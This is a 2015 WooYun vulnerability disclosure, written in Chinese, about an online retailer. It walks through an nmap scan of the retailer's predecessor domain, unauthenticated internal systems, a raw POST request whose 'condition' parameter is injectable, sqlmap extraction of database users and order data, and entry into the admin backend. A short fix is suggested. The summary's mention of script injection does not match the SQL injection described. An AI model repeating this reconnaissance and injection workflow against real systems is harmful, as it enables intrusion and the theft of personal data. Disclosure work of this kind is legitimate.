漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0114706
漏洞标题:蜜淘网某站存在sql注入漏洞影响300W+用户数据
相关厂商:蜜淘网
漏洞作者: 堂吉诃德
提交时间:2015-05-18 06:30
修复时间:2015-07-02 06:32
公开时间:2015-07-02 06:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
内部系统存在sql注入漏洞,从而侵入成功,将数十万订单数据, 数百万手机号,姓名,身份证号码泄露
详细说明:
提交数据的时候可以嵌套js代码,完成后刷新页面能够执行
漏洞证明:
先看了下主站感觉没啥大漏洞,
然后扫了下域名得知 beilou.com 是其前生,然后扫描端口
Starting Nmap 6.46 ( http://nmap.org ) at 2015-05-17 22:37 CST
Nmap scan report for beilou.com (182.92.111.61)
Host is up (0.013s latency).
Not shown: 978 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
901/tcp filtered samba-swat
1068/tcp filtered instl_bootc
3128/tcp filtered squid-http
4444/tcp filtered krb524
5666/tcp open nrpe
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6129/tcp filtered unknown
6667/tcp filtered irc
8009/tcp open ajp13
8010/tcp open xmpp
8081/tcp open blackice-icecap
8090/tcp open unknown
8100/tcp open xprint-server
8200/tcp open trivnet1
9001/tcp open tor-orport
duang~ duang~ 其中8081是gitlab的地址 然后发现8090和8010竟然不需要认证
如下所示:
这个促销系统做的还挺不错的
iOS设备的推送系统
一般这种站,可能就不怎么严密估计有sql注入漏洞,果然就有一个
POST /red_packet/list HTTP/1.1
Host: monitor.beilou.com:8010
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://monitor.beilou.com:8010
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://monitor.beilou.com:8010/html/red_packet/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: request_method=GET; _gitlab_session=d14a5da0f1dc414332f62d942b315172; JSESSIONID=8817444C85A594E71289965295F21805
condition=12323
这个condition就是可以注入的,然后上sqlmap跑一下
跑出了数据库
然后在跑一些数据吧 : )
database management system users [1]:
[*] 'beilouguest'@'%'
用户表
还有一些订单信息
然后根据信息进入了后台。。。
-------------好了不继续了,不然要被请喝茶了------
修复方案:
原本很难搞到这里的,只要把外面的内部系统做个权限控制,然后sql注入的bug修改掉即可
加强安全意识啊
版权声明:转载请注明来源 堂吉诃德@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)